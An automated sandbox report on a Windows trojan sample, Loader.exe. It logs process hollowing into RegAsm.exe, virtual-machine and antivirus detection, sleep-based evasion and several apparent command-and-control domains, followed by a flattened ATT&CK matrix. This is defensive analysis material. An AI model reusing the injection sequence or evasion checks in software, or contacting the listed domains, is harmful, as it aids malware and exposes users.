    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004306F72_2_004306F7
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406E802_2_00406E80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00436E822_2_00436E82
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00430EAE2_2_00430EAE
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401FC52_2_00401FC5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404FD02_2_00404FD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418FD52_2_00418FD5
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402FE02_2_00402FE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004357E02_2_004357E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042EF892_2_0042EF89
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043DF902_2_0043DF90
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004237A02_2_004237A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040A310 appears 59 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040AA20 appears 134 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768
    Source: Loader.exe, 00000000.00000002.2034024823.000000000103E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Loader.exe
    Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/6@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004365E0 CoCreateInstance,2_2_004365E0
    Source: C:\Users\user\Desktop\Loader.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Loader.exe.logJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308
    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\876357eb-762c-4857-85e2-bda122f00970Jump to behavior
    Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Loader.exeReversingLabs: Detection: 52%
    Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Loader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb source: Loader.exe
    Source: Binary string: c:\wkm1f0mk4\obj\Re\ease\fsB.pdb0 source: Loader.exe
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043504B push ss; retf 2_2_0043504F
    Source: Loader.exeStatic PE information: section name: .text entropy: 7.994081518610872
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 14F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory allocated: 4E20000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exe TID: 940Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6200Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\Loader.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: Amcache.hve.6.drBinary or memory string: VMware
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
    Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: RegAsm.exe, 00000002.00000002.2208570206.0000000001026000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-15896
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0043C800 LdrInitializeThunk,2_2_0043C800
    Source: C:\Users\user\Desktop\Loader.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\Loader.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_02E2249D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_02E2249D
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
    Source: Loader.exe, 00000000.00000002.2034446144.0000000003E25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: froytnewqowv.shop
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 443000Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D0D008Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\Users\user\Desktop\Loader.exe VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Loader.exe, 00000000.00000002.2034024823.0000000001076000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Loader.exe, 00000000.00000002.2034024823.0000000001076000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.exe
    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    411
    Process Injection
    1
    Masquerading
    OS Credential Dumping21
    Security Software Discovery
    Remote Services1
    Screen Capture
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Disable or Modify Tools
    LSASS Memory41
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Archive Collected Data
    2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
    Virtualization/Sandbox Evasion
    Security Account Manager22
    System Information Discovery
    SMB/Windows Admin Shares2
    Clipboard Data
    113
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
    Process Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
    Obfuscated Files or Information
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
    Software Packing
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
